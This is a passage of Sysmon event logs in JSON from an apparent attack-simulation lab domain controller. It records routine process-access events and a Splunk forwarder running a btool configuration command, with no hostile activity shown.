C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3005,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3006,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-00107B3F0500}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-00107B3F0500}","TargetProcessId":"2764","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3007,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.421\r\nSourceProcessGUID: {41C8662E-1FF0-5F25-0000-00107B3F0500}\r\nSourceProcessId: 2764\r\nSourceThreadId: 4012\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.421","SourceProcessGUID":"{41C8662E-1FF0-5F25-0000-00107B3F0500}","SourceProcessId":"2764","SourceThreadId":"4012","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3008,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.449\r\nProcessGuid: {41C8662E-1FF0-5F25-0000-001094420500}\r\nProcessId: 4204\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FEF-5F25-0000-00106D380500}\r\nParentProcessId: 2584\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2488","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.449","ProcessGuid":"{41C8662E-1FF0-5F25-0000-001094420500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FEF-5F25-0000-00106D380500}","ParentProcessId":"2584","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2488","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3009,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.436\r\nSourceProcessGUID: {41C8662E-1FEF-5F25-0000-00106D380500}\r\nSourceProcessId: 2584\r\nSourceThreadId: 3476\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-001094420500}\r\nTargetProcessId: 4204\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.436","SourceProcessGUID":"{41C8662E-1FEF-5F25-0000-00106D380500}","SourceProcessId":"2584","SourceThreadId":"3476","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-001094420500}","TargetProcessId":"4204","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3010,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.436\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-001094420500}\r\nTargetProcessId: 4204\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.436","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-001094420500}","TargetProcessId":"4204","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3011,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.436\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.436","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3012,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.436\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.436","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3013,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.436\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 